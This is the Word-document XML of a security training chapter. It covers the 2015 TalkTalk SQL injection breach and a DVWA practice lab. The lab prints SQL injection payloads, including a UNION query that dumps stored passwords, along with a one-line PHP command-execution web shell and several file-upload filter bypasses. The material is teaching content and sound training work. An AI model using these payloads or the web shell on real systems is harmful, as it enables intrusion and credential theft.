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CASE STUDY &amp; PRACTICE — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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+ FILE UPLOAD LAB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Real-world case studies are essential for understanding the impact of vulnerabilities like SQL Injection, file upload exploitation, and weak server-side validation. This section includes both a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>true major breach</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>safe hands-on practice lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to help you internalize these concepts.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1. Case Study: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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TalkTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Data Breach (2015)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b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Victim</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70A3D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</w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TalkTalk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Telecom Group — one of the largest internet service providers in the UK.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b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Attack Type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70A3D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  <w:t xml:space="preserve">SQL Injection (Blind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SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70A3D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  <w:t xml:space="preserve">Teenagers (15–17 years old) who discovered the flaw using automated SQL scanning tools similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>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A. How the Attack Happened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70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TalkTalk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had several </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>legacy, outdated web pages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> still publicly accessible.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>These old pages were:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Not maintained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Not patched</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Still connected to production databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Vulnerable to SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Not monitored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Attackers used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>-like tools to scan for injectable parameters.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Key Weaknesses Identified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Directly concatenated input into SQL queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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 input validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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 WAF (Web Application Firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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No monitoring of suspicious traffic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Public access to deprecated pages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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The attackers found a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>blind SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability in a customer webpage.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B. What the Attackers Did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Once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confirmed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>injectability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, the attackers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Retrieved table names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Extracted customer information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Pulled personal records</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Attempted privilege escalation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70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"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automated the entire attack in minutes.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C. Impact of the Breach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150,000+ customer records stolen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15,600 bank account numbers exposed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Company lost millions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Severe reputation damage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Huge drop in stock price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D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TalkTalk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fined </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>£400,000</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by ICO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Although the attackers were teenagers, the impact was massive.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D. Key Lessons Learned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1. Legacy Systems Are Dangerous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Old, forgotten pages → weakest attack points.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2. Lack of Input Validation = Disaster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If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TalkTalk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used prepared statements,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SQLi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would have been impossible.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3. Automation Makes Attacks Easy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Even beginners can cause major breaches using tools like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>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4. Security Is Not “Build Once”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lastRenderedPageBreak/>
        <w:t>It must be maintained and continually audited.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5. Monitoring Would Have Prevented Damage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Hundreds of suspicious SQL errors were ignored.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b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Final Lesson</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70A3D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eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One outdated page can compromise an entire company.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Practice Lab (Do NOT attack real websites)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Below is a legal, safe, offline environment for practicing SQL Injection, file upload exploitation, and Burp Suite attacks.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b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recommended Tool</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70A3D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DVWA — Damn Vulnerable Web Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>(Part of most cybersecurity labs and Kali Linux)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A. Practice 1 — SQL Injection (DVWA)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Location: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DVWA → SQL Injection Module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Objective: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Learn how basic SQL Injection works.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1: Try wildcard input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Type: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%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This lists all users because </w:t>
      </w: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%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a SQL LIKE wildcard.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2: Try classic SQL injection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lastRenderedPageBreak/>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="003B0AB3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</w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00D70A3D" w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR '1'='1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Expected Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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The application bypasses the username check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Returns all account data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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Shows SQL injection vulnerability clearly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 xml:space="preserve">Step 3: Try numeric </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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If the field expects a number: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1 OR 1=1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This also dumps all entries.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 xml:space="preserve">Step 4: Try UNION-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">1 UNION SELECT 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user</w:t>
      </w:r>
      <w:proofErr w:type="gram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,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> FROM users--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This retrieves stored credentials.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B. Practice 2 — File Upload Vulnerability (DVWA)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Location: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DVWA → File Upload Module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Scenario: Upload a PHP Web Shell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Create</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&lt;?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proofErr w:type="gramEnd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system($_GET['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']); ?&gt;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Test Upload (Low Security)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">DVWA often accepts </w:t>
      </w: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files directly.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Upload and visit: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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/hackable/uploads/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shell.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1: High Security Mode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Set DVWA Security to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Now </w:t>
      </w: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files will be blocked.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2: Bypass with Double Extension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Rename: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shell.php.jpg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Upload again.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3: Use Burp Suite to Modify the Request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Intercept Upload Request → Modify Headers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Change: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Content-Type: image/jpeg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Even though file contains PHP code.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0A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Expected Result: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Some configurations allow this bypass.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0A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 4: Null Byte Test (If server is old)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Rename to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D7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shell.php%00.jpg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Older systems interpret </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%00</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a string terminator.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C. Important Notes for Beginners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DO NOT try these on real websites.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ONLY test on your own lab environment.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SQL Injection and file uploads are illegal without permission.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D70A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0A3D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D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Everything</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> becomes safe inside DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70A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0A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This chapter teaches:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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How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SQLi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caused one of the UK's biggest data breaches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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How automation tools like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SQLmap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exploit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SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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The importance of updating &amp; maintaining web pages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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 xml:space="preserve">How to practice </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D70A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and file upload exploitation safely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70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How to use Burp Suite to intercept and modify attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A3D" w:rsidRPr="00D70A3D" w:rsidRDefault="00D70A3D" w:rsidP="00D70A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0A3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Real-world breaches + hands-on practice = strong cybersecurity understanding.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68C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C5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639CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D7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32B5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8B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34F65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D9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73C08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B1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A3D"/>
    <w:rsid w:val="0026564B"/>
    <w:rsid w:val="003B0AB3"/>
    <w:rsid w:val="0060125E"/>
    <w:rsid w:val="00D7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4DAD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65CA3E60-EC3E-4E83-B974-DD96436E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70A3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0A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0A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0A3D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D70A3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0A3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70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="language-bash">
    <w:name w:val="language-bash"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70A3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D70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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-04T06:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-04T07:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>